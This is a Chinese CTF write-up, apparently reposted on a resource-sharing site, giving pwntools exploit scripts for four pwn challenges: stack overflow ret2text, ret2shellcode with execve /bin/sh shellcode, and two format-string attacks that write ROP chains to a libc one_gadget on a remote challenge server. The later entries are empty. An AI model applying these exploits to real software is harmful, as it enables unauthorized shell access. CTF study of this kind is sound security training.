SCUCTF WP
SCUCTF WP
1. ret2text
程序给出后门函数,且存在栈溢出,直接修改返回地址控制程序执行流即可
from pwn import *
context(os='linux', arch='i386', log_level='debug', terminal=['tmux', 'splitw', '-hp', '70'])
#p = process('./ret2text')
p = remote('114.117.187.56', 10002)
payload = b'A'*0x24 + p32(0) + p32(0x08049256)
p.recvuntil('get it !\n')
p.send(payload)
p.interactive()
2. ret2shellcode
栈溢出,bss可执行且地址可控,编写shellcode即可
from pwn import *
context(os='linux', arch='amd64', log_level='debug', terminal=['tmux', 'splitw', '-hp', '70'])
#p = process('./ret2shellcode')
p = remote('114.117.187.56', 10003)
shellcode = asm('''
mov rdx, 0
mov rsi, 0
mov rdi, 0x68732f6e69622f
push rdi
mov rdi, rsp
mov rax, 0x3b
syscall
''')
p.sendafter('shellcode?\n', shellcode)
#gdb.attach(p)
p.sendafter('ret2shellcode\n', b'A'*0x20 + p64(0) + p64(0x4040a0))
p.interactive()
3. fmt
格式化字符串漏洞,先利用%p泄露地址,然后在利用%hn和%n构造ROP链,先pop再one_gadget
from pwn import *
context(os='linux', arch='amd64', log_level='debug', terminal=['tmux', 'splitw', '-hp', '70'])
#p = process('./fmt', env = {"LD_PRELOAD" : "./libc.so.6"})
libc = ELF('./libc.so.6')
p = remote('114.117.187.56', 10004)
p.sendafter('your input: \n', b'%41$p')
libc = int(p.recv(14), 16) - 0x24083
info("libc ===> " + hex(libc))
p.sendafter('your input: \n', b'%32$p')
stack = int(p.recv(14), 16)
info("stack ===> " + hex(stack))
one_gadget = [0xe3afe, 0xe3b01, 0xe3b04]
pop_addr = 0x4013ec
payload = b'%' + str(pop_addr).encode() + b'c' + b'%8$n'
payload = payload.ljust(16, b'\x00') + p64(stack+0x22)
p.sendafter('your input: \n', payload)
payload = b'%8$n'
payload = payload.ljust(16, b'\x00') + p64(stack+0x22 + 4)
p.sendafter('your input: \n', payload)
for i in range(8):
payload = b'%8$n'
payload = payload.ljust(16, b'\x00') + p64(stack+0x22 + 8+4*i)
p.sendafter('your input: \n', payload)
aa = (libc + one_gadget[0]) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%8$hn'
payload = payload.ljust(16, b'\x00') + p64(stack+0x22+40)
p.sendafter('your input: \n', payload)
aa = ((libc + one_gadget[0]) >> 16) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%8$hn'
payload = payload.ljust(16, b'\x00') + p64(stack+0x22+40+2)
p.sendafter('your input: \n', payload)
aa = ((libc + one_gadget[0]) >> 32) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%8$hn'
payload = payload.ljust(16, b'\x00') + p64(stack+0x22+40+4)
p.sendafter('your input: \n', payload)
aa = ((libc + one_gadget[0]) >> 48) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%8$hn'
payload = payload.ljust(16, b'\x00') + p64(stack+0x22+40+6)
#p.sendafter('your input: \n', payload)
info("one_gadget ===> " + hex(libc + one_gadget[0]))
#gdb.attach(p)
#gdb.attach(p)
p.sendafter('your input: \n', b'exit')
p.interactive()
4. fmt2
这题跟上题的区别是数据不是直接写到栈上,但是可以利用栈中已有数据构成的链修改函数返回地址
from pwn import *
context(os='linux', arch='amd64', terminal=['tmux', 'splitw', '-hp', '70'])
#context.log_level = 'debug'
#p = process('./fmt-bss', env = {"LD_PRELOAD":"./libc.so.6"})
p = remote('114.117.187.56', 10005)
payload = b'%7$p'
p.sendafter("your input: \n", payload)
libc = int(p.recv(14), 16) - 0x24083
info("libc ==> " + hex(libc))
payload = b'%9$p'
p.sendafter("your input: \n", payload)
stack = int(p.recv(14), 16)
info("stack ==> " + hex(stack))
pop_ret = 0x40139c
aa = (stack - 0xf0) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)
aa = (pop_ret) & 0xffffffff
payload = b'%' + str(aa).encode() + b'c' + b'%37$n'
p.sendafter("your input: \n", payload)
aa = (stack - 0xf0 + 4) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)
payload = b'%37$n'
p.sendafter("your input: \n", payload)
# 接下来疯狂写零
for i in range(16):
aa = (stack - 0xf0 + 4*i + 8) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)
payload = b'%37$n'
p.sendafter("your input: \n", payload)
one_gadget = [0xe3afe]
aa = (stack - 0xf0 + 0x28) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)
aa = (libc + one_gadget[0]) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%37$hn'
#gdb.attach(p)
p.sendafter("your input: \n", payload)
aa = (stack - 0xf0 + 0x28 + 2) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)
aa = ((libc + one_gadget[0])>>16) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%37$hn'
p.sendafter("your input: \n", payload)
# 写入最后四个字节
aa = (stack - 0xf0 + 0x28 + 4) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%24$hn'
p.sendafter("your input: \n", payload)
aa = ((libc + one_gadget[0])>>32) & 0xffff
payload = b'%' + str(aa).encode() + b'c' + b'%37$hn'
#gdb.attach(p)
p.sendafter("your input: \n", payload)
p.sendafter("your input: \n", b'exit\n')
p.interactive()
5. easy_shellcode
6.
原文地址:http://www.cnblogs.com/countfatcode/p/16913858.html
1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长!
2. 分享目的仅供大家学习和交流,请务用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解!
5. 如有链接无法下载、失效或广告,请联系管理员处理!
6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!
7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员!
8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载
声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性
